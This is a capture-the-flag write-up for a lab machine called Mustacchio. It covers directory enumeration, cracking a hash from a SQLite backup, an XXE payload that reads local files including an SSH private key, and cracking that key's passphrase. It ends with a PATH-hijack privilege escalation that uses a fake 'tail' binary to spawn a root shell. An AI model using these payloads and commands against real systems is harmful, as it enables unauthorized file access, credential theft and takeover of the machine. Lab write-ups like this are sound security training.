Mustacchio

SQLite3 - Password Cracking - XXE - Dumping SSH keys - ssh2john.py - Strings - Abusing Tail command

Initial Access

  • Thw given IP - 10.10.74.246

  • We can observe the open ports - 22, 80, 8765

  • Eumerating the HTTP ports (80, 8765), we find a login panel on port 8765 and port 80 was just a normal template

  • Running a Gobuster scan on port 80 gives us /custom/ directory, enumerating it more leaks us a user.bak database file

  • We can use the SQLite3 command line tool to interact with the backup file and after some enumeration we find a potential encrypted password for the user admin

  • Using John we cracked the password - bulldog19

  • Now when we log in to the pannel and we find a Text field that is supposed to accept the comment for the website

  • Examining the source of port 8765, we find another interesting file called dontforget.bak in the /auth/ directory and there's also a comment saying Barry you can now SSH into the machine

  • So basically the text field present there accepts XML args

Exploitation

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
   <!ELEMENT data ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<comment>
  <name>&xxe;</name>
  <author>Akash</author>
  <com>ssup</com>
</comment>

  • This confirms that there is an XML Entity Attack, so now we can trick the web page to display Barry's SSH Private Keys - home/barry/.ssh/id_rsa

  • Copying those keys can give us SSH access to the machine, but no it denies

  • Setting proper permissions - chmod 600 id_rsa , but still it denies and asks for a password

  • Since the key was encrypted and will ask for a password if tried to log in directly, we used the ssh2john.py file to convert the contents of the key into to crackable hash

  • Using John to crack the hash gives us the passphrase - urieljames

Privilege Escalation

  • Diggin around the box gives us the presence of another user - joe

  • His home directory displays a SUID file called live_log, executing the file displays us a firefox's event log - which is of no use to us - the interesting part is that it's an ELF not stripped binary which has the ownership of the root user

  • We used the strings command to take a closer look at this binary file

  • We found that this binary file runs the tail command without using its absolute path - /usr/bin/tail

  • This means that we will be able to exploit it by creating our version of the tail command

cd /dev/shm
echo "/bin/bash" > tail
chmod 777 tail
export PATH=/dev/shm:$PATH
/home/joe/live_log
cd /root
cat root.txt

We moved to the /dev/shm directory

We created our version of the tail command but made it in such a way that it invokes the /bin/bash

We changed the permissions so that we are allowed to execute the file - 777

Next, we need to export the path so that when executed by the live_log, our version of the tail gets executed instead of the original tail

We executed the live_log file as Barry and got the root access

PreviousCorridorNextWordpress: CVE-2021-29447

Last updated